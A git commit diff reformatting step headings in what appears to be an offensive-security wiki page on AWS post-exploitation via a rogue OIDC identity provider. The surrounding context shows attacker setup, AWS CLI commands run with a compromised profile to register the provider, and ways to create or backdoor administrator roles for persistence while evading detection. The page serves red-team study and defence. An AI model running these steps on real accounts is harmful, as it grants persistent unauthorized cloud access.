Merge pull request #456 from saw-your-packet/main

fix(rogue-iam): number steps

Author: Frichetten

content/aws/post_exploitation/iam_rogue_oidc_identity_provider.md

@@ -24,19 +24,19 @@ This technique involves deploying an OIDC web server, creating an OIDC Identity
 
 Before we begin, you will need a domain for this technique. AWS doesn't accept as OIDC Identity Providers IP addresses or domains that use self-signed certificates.
 
-1. Start an EC2 instance
+### 1. Start an EC2 instance
 
 > Environment: attacker
 
 You will need a server to deploy the web OIDC Identity Provider (IdP). This server should expose port 443 to the internet.
 
-2. Configure a DNS record
+### 2. Configure a DNS record
 
 > Environment: attacker
 
 Add an A DNS record for a subdomain that will point to the IP of the EC2 instance. For the rest of the article we will assume that the subdomain is named `oidc` and the domain is `example.com`.
 
-3. Connect to the instance and download Rogue OIDC IdP server
+### 3. Connect to the instance and download Rogue OIDC IdP server
 
 > Environment: attacker
 
@@ -46,7 +46,7 @@ sudo yum install git
 git clone https://github.com/OffensAI/RogueOIDC
 ```
 
-4. Generate certificate
+### 4. Generate certificate
 
 > Environment: attacker
 
@@ -57,7 +57,7 @@ sudo yum install certbot
 sudo certbot certonly --standalone -d oidc.example.com
 ```
 
-5. Configure Rogue OIDC Identity Provider
+### 5. Configure Rogue OIDC Identity Provider
 
 > Environment: attacker
 
@@ -80,7 +80,7 @@ HOST=0.0.0.0
 PORT=443
 ```
 
-6. Install requirements
+### 6. Install requirements
 
 > Environment: attacker
 
@@ -94,7 +94,7 @@ source web/bin/activate
 pip install -r requirements.txt
 ```
 
-7. Start the server
+### 7. Start the server
 
 > Environment: attacker
 
@@ -104,7 +104,7 @@ sudo web/bin/python main.py
 
 Verify that `https://odic.example.com/.well-known/openid-configuration` is accessible and reflects the configurations made.
 
-8. Create the OIDC provider
+### 8. Create the OIDC provider
 
 > Environment: victim
 
@@ -114,15 +114,15 @@ This command will be executed using the compromised identity from the victim's a
 aws --profile compromised_user iam create-open-id-connect-provider --url https://oidc.example.com --client-id-list oidc_client
 ```
 
-9. Persistence
+### 9. Persistence
 
 > Environment: victim
 
 There are two ways to achieve persistence. The first involves creating a role with a trust policy for the OIDC IdP and attaching a policy to it afterwards. This might be easily detected.
 
 The second one involves modifying the trust role policy of an existing role. While this is still a well-known persistence technique, combining it with an OIDC IdP may evade detection by some tools and defenders.
 
-9.1 Create a new role with this OIDC Identity Provider in the trust policy
+#### 9.1 Create a new role with this OIDC Identity Provider in the trust policy
 
 The trust role policy document can be found below. Make sure it matches the client ID and subject configured in the Rogue OIDC server.
 
@@ -157,15 +157,15 @@ aws --profile compromised_user iam attach-role-policy --role-name poc-random-str
 
 Now you just created an administrator role that can be assumed with the last step from the article. Keep in mind that is enough to create a role, without attaching any policies for doing a PoC.
 
-9.2 Modify the role trust policy of an existing role
+#### 9.2 Modify the role trust policy of an existing role
 
 With this method you would ideally get the trust policy of an existing role, modify it by adding your OIDC provider and update the role with the new policy document. This way, the role would continue to work, but it would also be backdoored.
 
 ```bash
 aws --profile compromised_user iam update-assume-role-policy --role-name poc-random-string --policy-document file://policy.json
 ```
 
-10. Assume the role
+### 10. Assume the role
 
 Finally, you can now assume the role at any time. The script for assuming it is in the same repository as the Rogue web OIDC IdP.